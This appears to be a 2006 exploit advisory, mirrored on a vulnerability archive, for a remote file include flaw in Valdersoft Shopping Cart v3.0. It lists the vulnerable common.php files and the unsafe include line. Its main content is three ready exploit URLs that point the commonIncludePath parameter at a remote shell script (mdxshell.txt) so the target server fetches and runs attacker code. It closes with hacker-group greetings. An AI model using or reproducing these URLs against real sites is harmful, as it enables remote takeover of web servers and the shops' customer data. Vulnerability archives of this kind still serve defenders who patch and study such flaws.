Valdersoft Shopping Cart v3.0 (E-Commerce Software)*****[ commonIncludePath ] Remote File Include

2006-12-20T00:00:00
ID SECURITYVULNS:DOC:15448
Type securityvulns
Reporter Securityvulns
Modified 2006-12-20T00:00:00

Description


Valdersoft Shopping Cart v3.0 (E-Commerce Software)*[ commonIncludePath ] Remote File Include



+class : Remote File Include Vulnerability*


+Author : mdx *


+Files : +/common_include/common.php , /include/common.php, /admin/include/common.php


+code : + + include ( $commonIncludePath."common.php" ); * + *


  • Exploit : +*************+
  • http://www.site./[path]/admin/include/common.php?commonIncludePath=http://mdxshell.txt?+ +**************+
  • http://www.site./[path]/include/common.php?commonIncludePath=http://mdxshell.txt?*+ +*************+
  • http://www.site./[path]/common_include/common.php?commonIncludePath=http://mdxshell.txt?+ +*************+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ============================================================================================== ? ? ? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord ? ?///////////////////////////////////////////////////////////////////////////////////////////// ?---------------------specials thanks stroke ,SHiKaA----------------------------------------*

*** * ** KORKULARINIZ SADECE KABUSLARINIZDIR.. ** ** Turkish Hacker by mdx ** ** Korkmak Kurtulmak Degildir. ** **************